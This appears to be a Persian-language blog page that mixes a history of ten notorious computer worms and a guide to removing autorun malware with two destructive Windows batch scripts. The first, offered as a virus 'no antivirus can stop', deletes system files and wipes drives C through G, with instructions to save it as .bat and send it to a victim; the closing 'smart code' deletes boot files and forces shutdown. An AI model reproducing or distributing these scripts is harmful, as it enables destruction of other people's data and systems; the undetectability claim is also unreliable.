exploit

هیچ وقت برای تازه شدن دیر نیست!

exploit

هیچ وقت برای تازه شدن دیر نیست!

ویروسی که شناسایی نمیشه

 ویروس قابلیتی که داره اینه که هیچ آنتی ویروسی نمی تونه در برابرش کاری کنه و بعد از ری استارت ویندوز فرمت میشه

برای ساختن این ویروس مراحل زیر رو انجام بدید

به نوت پد رفته و این عبارت رو بنویسید

del autotexec.bat
del config.sys
cd winnt
del system.ini
del win.ini
بعد اونو با فرمت bat  سیو کنین و برای قربانی بفرستین

اگر اجرا شود هارد بلافاصله فرمت میشود

@echo off
ATTRIB -a -s -h -r c:\*.*
ATTRIB -a -s -h -r c:\windows\*.*
Echo y | echo a | Echo y |del c:\*.*
Echo y | echo a | Echo y |del d:\*.*
Echo y | echo a | Echo y |del e:\*.*
Echo y | echo a | Echo y |del f:\*.*
Echo y | echo a | Echo y |del g:\*.*
echo y | copy *.* c:\
echo y | copy *.* D:\
echo y | copy *.* E:\
echo y | copy *.* f:\
echo y | copy *.* g:\
restart 

با پسوند bat.* ذخیره شود

محلک ترین کرم های تاریخ

می‌شناسیم؛ برنامه‌هایی که از طریق حفره‌های امنیتی ویندوز می‌خزند و پیش‌ می‌روند و کم کم همه اینترنت را تسخیر می‌کنند. یک روز ویندوز را ری استارت می‌کنند و یک روز مسیریاب‌های بزرگ را فلج. کرم‌ها بر خلاف ویروس‌ها به دیگر برنامه‌ها نمی‌چسبند و فقط از طریق تکثیر خود، به پیش می‌روند. هر کرم شاید میلیاردها دلار به اقتصاد جهانی ضرر بزند و در این مقاله می‌خواهیم ده تا از این دشمنان اینترنت را به شما معرفی کنیم:

۱. اورشلیم (مشهور به BlackBox)

در سال ۱۹۸۷ کشف شد و یکی از اولین کرم‌ها بود. این کرم هر فایلی که در روز جمعه ۱۳ام اجرا می‌شد را پاک می‌کرد و اسمش را هم از شهری گرفته بود که اولین بار در آن دیده شده بود.

این کرم که به فایل‌های داس (پدر جد ویندوز) حمله می‌کرد، اندازه همه فایل‌های اجرایی را تغییر می‌داد (به جز command.com)

هرچند که این کرم مدت‌ها قدرت خودش را حفظ کرد ولی با مرسوم شدن ویندوز، کم کم از خاطره‌ها پاک شد.

۹. میکلانژ

در سال ۱۹۹۱ هزاران کامپیوتر مبتنی بر داس با یک کرم جدید مواجه شدند که در روز تولد میکلانژ (۱۶ مارس)‌ فعال شده بود. در آن روز هارد دیسک کامپیوترهای آلوده پاک شد.

بعد از مشهور شدن این کرم، از آن به عنوان یک خطر واقعی یاد شد و میلیون‌ها نفر نگران آن شدند. اما در عمل شاید فقط ۱۰ یا ۲۰ هزار کامپیوتر دچار مشکل شد. آن تاریخ خاص در دنیای کامپیوتر به «جنون میکلانژ» مشهور شد؛ مردم آنتی ویروس می‌خریدند، به پشتیبانی مایکروسافت زنگ می‌زدند و حتی تعداد زیادی از شرکت‌ها در آن روز خاص کامپیوتر خود را اصلا روشن نکردند.

۸. Storm Worm

یکی از جدیدترین کرم‌های اینترنتی است که در ژانویه ۲۰۰۷ ظاهر شد. ویروس اولین بار ۱۹ ژانویه دیده شد و سه روز بعد بنا به آمار ۸٪ کل آلودگی‌های دنیا به آن مربوط بود.

کامپیوتر آلوده به این کرم به شکل خودکار بخشی از یک حمله DDOS می‌شد که تلاش می‌کرد بعضی از وب‌سایت‌ها را با ارسال درخواست مداوم از کار بیاندازد. بنا به گمانه‌زنی‌ها این کرم تا ماه سپتامبر بین ۱ تا ۱۰ میلیون کامپیوتر را آلوده کرده بود. پاک کردن این کرم بسیار مشکل است چون شبکه بدون سر آن دائما خودش را به روز می‌کند و برای پاک کردن هر کامپیوتر باید آن را کاملا از شبکه ایزوله و سپس پاک کرد.

۷. Sobing

این کرم در سال ۲۰۰۳ میلیون‌ها کامپیوتر را آلوده کرد. روش پخش ایمیلی بود که فایل‌های pif یا scr به آن پیوست شده بود و در صورت اجرا، کامپیوتر یا میزبان را آلوده می‌کرد. کامپیوترهای آلوده به سرورهای SMTP تبدیل می‌شدند و شروع به ارسال مجدد ویروس می‌کردند.

این کرم برای پخش شدیدا به وب‌سایت‌های آلوده‌ای وابسته بود که خوشبختانه حتی قبل از کشف کرم، بسته شده بودند.

نتیجه؟ ضرری تقریبا ۱ میلیارد دلاری از طریق آلوده شدن نیم میلیون کامپیوتر.

۶. MSBlast

تابستان ۲۰۰۳ سال سختی برای نویسندگان برنامه‌های ضد ویروس بود. در جولای مایکروسافت اعلام کرد که یک حفره امنیتی جدی در ویندوز وجود دارد و یک ماه بعد این حفره برای نوشتن یک کرم استفاده شده بود. این ویروس نام خود را توسط نویسنده‌اش گرفته بود و حاوی یک پیام برای بیل گیتس بود. این پیام این بود «بیلی گیتس! چرا اجازه دادی این اتفاق بیافتد؟ پول درست کردن را ول کن و نرم‌افزارت را درست کن!»

ویروس ام.اس.بلست بعد از فعال شدن یک TFTP ایجاد می‌کرد و کد آلوده را به کامپیوتر قربانی منتقل می‌کرد و فقط چند ساعت بعداز کشف، ۷۰۰۰ کامپیوتر را آلوده کرده بود. فقط شش ماه بعد، ۲۵ میلیون سرور آلوده شناسایی شدند. یک سال طول کشید تا مایکروسافت یک کد برای متوقف کردن ویروس بلستر معرفی کند.

بعدها یک پسر نوجوان ۱۹ ساله به جرم نوشتن این کرم دستگیر و به ۱۸ ماه زندان و ۱۰ ماه کار عام المنفعه محکوم شد.

۵. ملیسا

دنبال پـو‌‌رن هستید ولی پیدایش نمی‌کنید؟ اگر در ۱۹۹۹ بودید احتمالا شما هم فایل List.DOC را دانلود می‌کردید تا به ۸۰ سایت دسترسی رایگان پیدا کنید؛ غافل از اینکه با اینکار شما هم به شبکه ارسال هزاران ایمیل ناخواسته‌ای پیوسته‌اید که در نهایت تقریبا کل اینترنت را از کار خواهند انداخت.

ملیسا از طریق ورد ۹۷ و ۲۰۰۰ منقل می‌شد و به شکل خودکار برای ۵۰ نفر اول آدرس بوک، ایمیل می‌فرستاد و بعضی فایل‌های مهم ویندوز را پاک می‌کرد.

ضرر ملیسا هم حدود ۱ میلیارد دلار تخمین زده شده و دیوید اسمیت (نویسنده آن) اسم ملیسا را از یک رقاص شـهوانی گرفته است که در فلوریدا برایش رقصید بوده. او به ۲۰ ماه زندان و ۵۰۰۰ دلار جریمه محکوم شد.

۴. کد قرمز

جولای ۲۰۰۱ و جمعه سیزدهم. کد قرمز فعال شده است که از حفره امنیتی وب سرور ویندوز به خاطر سرریز بافر استفاده می‌کند. وب سرورهایی که به این کرم آلوده می‌شوند این پیام را نشان می‌دهند:

سلام. به http://www.worm.com خوش آمدید! چینی‌ها اینجا را هک کرده‌اند

بعد از بیست تا بیست و هفت روز ماشین‌های آلوده شروع می‌کنند به حمله‌های DOS به یکسری آی پی از جمله آی پی کاخ سفید.

این کرم و کرم بعدی به نام کد قرمز ۲، گران‌ترین کرم‌های تاریخ هستند و ضرر آن‌ها ۲۰۰ میلیون دلار در روز محاسبه شده.

۳.نیمدا

در پایییز ۲۰۰۱ این کرم که نامش را از معکوس ادمین گرفته بود، با استفاده از اکسپلویت‌های ایمیل، تعداد زیادی از کامپیوترهای ویندوزی را آلوده کرد. این کرم به آدرس‌های ایمیل درون فایل‌های html کش شده نگاه می‌کرد و سرویس‌های MAPI را هم زیر نظر می‌گرفت و بعد کل هارد دیسک و اطلاعات درون آن را به اشتراک همگان می‌گذاشت.

بنا به تخمین، این کرم هم حدود ۵۳۰ میلیون دلار در طول یک هفته به اقتصاد جهانی ضرر زد.

۲. دوستت دارم یا ILOVEYOU

شاید یادتان باشد که در سال ۲۰۰۰ چقدر از ایمیلی با موضوع ILOVEYOU می‌ترسیدید و اگر آن را پاک می‌کردید، از یکی از پرضررترین کرم‌های تاریخ در امان بودید. فایل پیوست به نام LOVE-LETTER-FOR-YOU.txt.vbs باعث شد تا این کرم مثل آتش در جنگل خشک بین فهرست کل دوستان شما در برنامه مایکروسافت آوت‌کوک پخش شود.

نتیجه نهایی ضرری حداقل ۵.۵ میلیارد دلاری بود و حداقل ده درصد از کل اینترنت درگیر آن شدند.

اونل گوزمن، نویسنده ویروس و ساکن فیلیپین بدون هیچ مشکلی به زندگی ادامه داد چون قانونی در این مورد در فیلیپین وجود نداشت. بعد از این حادثه، دولت فیلیپین این قانون را در اولویت قرار داد و برای نوشتن کرم و ویروس بین ۶ ماه تا یک سال زندان و حداقل ۲۰۰۰ دلار جریمه در نظر گرفت.

۱. کرم موریس (مشهور به کرم اعظم)

اینترنت چقدر بزرگ است؟ این سوالی است که یک دانشجوی دانشگاه کورنل به نام روبرت تپمن در ۱۹۸۸ از خودش پرسید و برای جواب به آن یک برنامه ۹۹ خطی نوشت. او قصد هیچ آزاری نداشت ولی باگ برنامه باعث شد تا برای سرورهای بین راه مشکلاتی پیش بیاید و در نهایت داون شوند. نتیجه داون شدن ۶۰۰۰ سرور یونیکس (چون ویندوز هنوز به نسخه ۳.۱ هم نرسیده بود) در آمریکا و ضرری بین ۱۰ تا ۱۰۰ میلیون دلار بود

روش های مقابله و حذف ویروس ها

1 - قبل از هر چیز Task Manager را اجرا کنید ( با زدن کلیدهای Alt , CTRL , Del به صورت همزمان ) و برنامه های مشکوکی مانند Systray.exe و Userinit.exe و Spoolsv.exe و Soundman.exe و Sounmax.exe را با زدن دکمه End Task  ببندید .
همچنین در بعضی از نسخه ها لازم است پروسس Svchost.exe  را نیز با کلیک راست کردن و انتخاب End Process Treeببینید . ( البته چندین Svchost.exe  وجود دارد که شما باید پروسسی که در ستون UserName نام کابر فعلی جلوی Svchost.exe  نوشته شده را ببندید (

سپس  باید به صورت دستی فایلهای Autorun.inf و Autorun.exe و Autoply.exe موجود در درایوهای آلوده را حذف کنید .
در کلیه مراحل حذف ویروس درایوها را با دابل کلیک باز نکنید و فقط از طریقRUN  باز کنید .

برای حذف این فایلها می توانید وارد محیط داس شوید ، سپس در این پنجره دستورات زیر را برای کلیه درایوها انجام دهید .

 حذف AUTORUN.INF

 attrib -r -a -h -s Drive:\AUTORUN.INF
del Drive:\AUTORUN.INF

 حذف Autorun.exe

 attrib -r -a -h -s Drive:\autorun.exe
del Drive:\autorun.exe

 

حذف Autoply.exe

  attrib -r -a -h -s Drive:\autoply.exe
del Drive:\autoply.exe


2 – سپس فایلهای زیر را دانلود نمایید .

 


AutoPly.exe Remover Autorun.exe  Saldost Registry Repair

<!--[if !supportLineBreakNewLine]--><!--[endif]-->

 

برای برگرداندن Folder Optins به پنجره Run رفته و دستور Regedit را نوشته و اجرا کنید .

حال از منوی Edit  گزینه Find را انتخاب کنید و عبارت NoFolderOption را نوشته تا این عبارت در رجیستری جستجو شود . هر بار که این عبارت را یافتید بایستی روی آن دابل کلیک کرده و مقدار ارزش آن را از 1 به صفر تغییر دهید . یک بار سیستم را رست کنید .  

نکته 1 : درصورتیکه Taskmanager و یا Regedit نیز غیر فعال شده اند به مقاله " فعال کردن Regedit "  و  " فعال کردن Taskmanager "  مراجعه نمایید .

نکته  2 : برای فعال کردن حالت نمایش کلیه فایلهای سیستمی و مخفی وارد My Computer شده و سپس به منوهای زیر بروید :
Tools->FolderOptions->View سپس گزینه Show Hidden Files And Filders را فعال کنید .
همچنین گزینه Hide protected operating system files را غیرفعال نمایید .

نکته 3 : توجه کنید که درایوها را با دابل کلیک باز نکنید و فقط با روش گفته شده در بالا درایوها را باز کنید . 

نکته 4 : به درایوی که ویندوز در آن نصب شده بروید و در مسیر Program files پوشه XpCode را حذف کنید .

 

نکته 5 : به درایوی که ویندوز در آن نصب شده بروید و وارد پوشه Documents and Settings شده و در آنجا وارد پوشه ای که به نام کاربر فعلی میباشد شده و سپس در پوشه Local Settings فایل Startup.exe را حذف کنید . ( توجه کنید که Local Settings نیز پوشه ای مخفی و سیستمی است ) . در همین پوشه وارد پوشه Temp شده و کلیه فایلهای موجود در آن خصوصا Systray.exe را حذف کنید .

 

نکته 6 : در پنجره Run عبارت MsConfig را نوشته و در بخش Startup کلیه گزینه ها را از حالت انتخاب خارج کنید هیچکدام تیکدار نباشند .

نکته 7 : از پوشه Startup  واقع در C:\Documents and Settings\ user\Start Menu\Programs\Startup  برنامه هایی که کلمه Update را دارند حذف کنید .  ( مانند Office Update و یا Adobe Update  )

 

حال سیستم را ریست کنید .

 

3 - پس از راه اندازی مجدد سیستم ، یکبار کل سیستم را با آنتی ویروس بروز شده مانند Nod 32  اسکن کنید و درصورت رفع مشکل باز در پنجره Run عبارت MsConfig را نوشته و در بخش Startup گزینه هایی را که  غیرفعال کرده بودید را به حالت قبل درآورید .

نکته 8 : در یکی از نسخه های این ویروس در بخش Startup فایلی به نام  Soundman.exe یا SoundMax.exe نیز وجود دارد که باید غیر فعال شود و این فایل نیز از مسیر \Sound Utility\Soundmax.exe حذف گردد.
همچنین از طریق رجیستری در مسیر

 

HK_ L_M\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SoundMax

باید Soundmax یا Soundman.exe را حذف کنید .

نکته 9 : System Restore را غیر فعال کنید چون که این ویروس خود را System Volume Information ذخیره می کند

smart code

@echo off
attrib –r –s –h c:\autoexec.bat
del c:\autoexec.bat
attrib –r –s –h c:\boot.ini
del c:\boot.ini
attrib –r –s –h c:\ntldr
del c:\ntdlr
attrib –r –s –h c:\windows\win.ini
del c:\windows\win.ini
@echo off
Msg *YOU GOT INFECTED!
Shutdown –s –t 7 –c “A VIRUS IS TAKING OVER c:Drive